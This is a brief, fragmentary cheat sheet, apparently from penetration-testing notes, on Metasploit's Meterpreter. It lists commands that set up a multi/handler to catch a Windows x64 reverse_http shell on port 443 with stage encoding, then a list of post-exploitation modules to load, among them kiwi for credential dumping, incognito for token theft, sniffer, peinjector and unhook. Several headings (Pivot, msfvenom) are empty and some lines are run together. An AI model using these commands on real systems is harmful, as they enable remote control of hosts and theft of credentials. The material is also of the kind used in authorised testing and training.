Meterpreter
Start
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding True
set ExitOnSession false
exploit -jmeterpreter -r script.rbCatch:
load bofloader
load espia
load extapi
load incognito
load kiwi
load lanattacks
load peinjector
load powershell
load priv
load python
load sniffer
load stdapi
load unhook
load winpmem Pivot:
meterpreter
msfconsole
Multi/handler
switch transports:
Pivot :
msfdb
msfvenom
Last updated